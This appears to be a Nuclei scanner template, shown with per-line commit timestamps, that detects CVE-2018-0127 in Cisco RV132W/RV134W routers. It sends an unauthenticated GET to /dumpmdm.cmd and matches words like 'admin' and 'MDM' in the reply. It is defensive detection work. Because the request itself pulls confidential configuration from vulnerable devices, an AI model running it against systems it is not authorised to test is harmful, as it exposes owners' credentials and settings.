2021-10-01 19:30:31 +00:00
id : CVE-2018-0127
2021-10-01 23:03:14 +00:00
2021-10-01 19:30:31 +00:00
info :
2022-05-13 20:26:43 +00:00
name : Cisco RV132W/RV134W Router - Information Disclosure
2021-10-01 19:30:31 +00:00
author : jrolf
severity : critical
2022-05-13 20:26:43 +00:00
description : Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device via the web interface, which could lead to the disclosure of confidential information.
2023-09-06 12:57:14 +00:00
remediation : |
Apply the latest firmware update provided by Cisco to fix the vulnerability.
2021-10-01 23:05:32 +00:00
reference :
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2
2022-07-01 10:02:07 +00:00
- http://web.archive.org/web/20211207054802/https://securitytracker.com/id/1040345
2022-05-13 20:26:43 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-0127
2023-07-15 16:29:17 +00:00
- http://www.securitytracker.com/id/1040345
2022-04-22 10:38:41 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2018-0127
2023-08-31 11:46:18 +00:00
cwe-id : CWE-200,CWE-306
epss-score : 0.0948
epss-percentile : 0.93961
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : "cisco"
product : rv132w_firmware
tags : cve,cve2018,cisco,router
2021-10-01 19:30:31 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-10-01 19:30:31 +00:00
- method : GET
path :
- "{{BaseURL}}/dumpmdm.cmd"
2021-10-01 23:03:14 +00:00
2021-10-01 19:30:31 +00:00
matchers-condition : and
matchers :
- type : word
2021-10-05 18:12:16 +00:00
part : body
2021-10-01 19:30:31 +00:00
words :
- "Dump"
- "MDM"
- "cisco"
- "admin"
2023-07-11 19:49:27 +00:00
condition : and
- type : status
status :
- 200